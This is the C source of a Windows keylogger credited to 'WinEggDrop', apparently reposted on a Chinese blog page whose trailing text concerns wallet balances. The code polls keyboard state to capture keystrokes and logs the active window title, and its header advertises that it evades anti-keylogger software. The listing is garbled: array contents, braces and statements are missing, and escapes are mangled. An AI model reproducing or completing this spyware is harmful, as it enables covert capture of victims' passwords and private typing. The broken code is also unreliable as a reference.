
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: Hookless Keylogger
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)
// Limitation: More Usage Of System Resource; May Not Work On Win9x
// Advantage: Hookless Technique Fools Anti-Keylogger Programs

#include <windows.h>
#include <stdio.h>

// Some Global Variables

// Lower Case Key & Some Other Keys
char *LowerCase[]={
  " ",
  "[Print Screen]",
  "[Scroll Lock]",
  "[Num Lock]",

// Upper Case Key & Some Other Keys
char *UpperCase[]={
  " ",
  "[Print Screen]",
  "[Scroll Lock]",
  "[Num Lock]",

// Ascii Keys,Forget About It
int SpecialKeys[]={

HWND PreviousFocus=NULL;
// End Of Data

// Function ProtoType Declaration
BOOL IsWindowsFocusChange();
BOOL KeyLogger();
// End Of Fucntion ProtoType Declaration

// Main Function
int main()
KeyLogger();     // Run The Keylogger
return 0;     // The Program Quit
// End Of Main

// Purpose: To Check The Active Windows Title
// Return Type: Boolean
// Parameters:  NULL
BOOL IsWindowsFocusChange()
HWND hFocus = GetForegroundWindow();     // Retrieve The Active Windows/'s Focus
BOOL ReturnFlag = FALSE;     // Declare The Return Flag
if (hFocus != PreviousFocus)    // The Active Windows Has Change
   PreviousFocus = hFocus;      // Save The Old Active Windos Focus
    int WinLeng = GetWindowTextLength(hFocus);    // Get The Active Windows/'s Caption/'s Length
   char *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2));    // Allocate Memory For The Caption
   GetWindowText(hFocus,WindowCaption,(WinLeng + 1));      // Retrieve The Active Windows/'s Caption
   if (strlen(WindowCaption) > 0)     // Really Get The Windows/'s Caption
      printf("//r//nThe Active Windows Title: %s//r//n",WindowCaption);    // Display The Active Windows/'s Caption
      ReturnFlag=TRUE;    // Indicate The Windows/'s Focus Has Changed
   free(WindowCaption);      // Free The Allocated Memory
return ReturnFlag;     // Return The Flag
}// End Of IsWindowsFocusChange Function

// Purpose: To Manage(Display)The Keys Retrieved From System/'s Key Buffer
// Return Type: Boolean
// Parameters:  NULL
BOOL KeyLogger()
int bKstate[256] = {0};      // Declare The Key State Array
int i,x;
char KeyBuffer[600];      // Key Buffer Array
int state;    // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ect
int shift;    // Variable To Hode State Of Shift Key

// Reset The Buffer

while(TRUE)      // Forever Loop Is Taking Place Here
   Sleep(8);     // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UP
   if (IsWindowsFocusChange())     //Check The Active Windows Title
      if (strlen(KeyBuffer) != 0)     // Keys Are Pressed
         printf("%s//r//n",KeyBuffer);     // Display The Keys Pressed
         memset(KeyBuffer,0,sizeof(KeyBuffer));      // reset The Buffer

   for(i=0;i<92;i++)      // Looping To Check Visual Keys
      shift = GetKeyState(VK_SHIFT);     // Check Whether Shift Is Pressed
      x = SpecialKeys[ i ];    // Match The Key
      if (GetAsyncKeyState(x) & 0x8000)     // Check Combination Keys
         // See Whether CapsLocak Or Shift Is Pressed
        if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91)))    //Caps Lock And Shift Is Not Pressed
           bKstate[x] = 1;      //Uppercase Characters A-Z
           if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91)))     //Caps Lock And Shift Is Pressed
              bKstate[x] = 2;      //Lowercase a-z
              if (shift < 0)    // Shift Is Pressed
                 bKstate[x] = 3;         //Uppercase Characters A-Z
                   bKstate[x] = 4;       //Lowercase a-z
         if (bKstate[x] != 0)      // No Combination Keys Detected
            state = bKstate[x];    // Retrieve The Current State
            bKstate[x] = 0;     // Reset The Current State
            if (x == 8)      // Back Space Is Detected
               KeyBuffer[strlen(KeyBuffer) - 1] = 0;    // One Key Back Then
               continue;     // Start A New Loop
               if (strlen(KeyBuffer) > 550)    // Buffer FULL
                  printf("%s <Buffer Full>",KeyBuffer);    // Display The Keys Retrieved
                  memset(KeyBuffer,0,sizeof(KeyBuffer));      // Reset The Buffer
                  continue;     // Start A New Loop
                   if (x == 13)    // Enter Is Detected
                     if (strlen(KeyBuffer) == 0)     // No Other Keys Retrieved But Enter
                        continue;     // Start A New Loop
                     printf("%s<Enter>//r//n",KeyBuffer);    // Retrieve Other Keys With Enter
                      memset(KeyBuffer,0,sizeof(KeyBuffer));     // Display The Keys With Enter
                      continue;    // Start A New Loop
                       if ((state%2) == 1)     //Must Be Upper Case Characters
                        strcat(KeyBuffer,UpperCase[ i ]);    // Store The Key To Key Buffer
                           if ((state%2) == 0)    // Must Be Lower Case Characters
                           strcat(KeyBuffer,LowerCase[ i ]);    // Store The Key To Key Buffer
   }// End Of For Loop
}// End Of While Loop
return TRUE;     // Return To The Caller
}// End Of KeyLogger Function
// End Of File 





当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


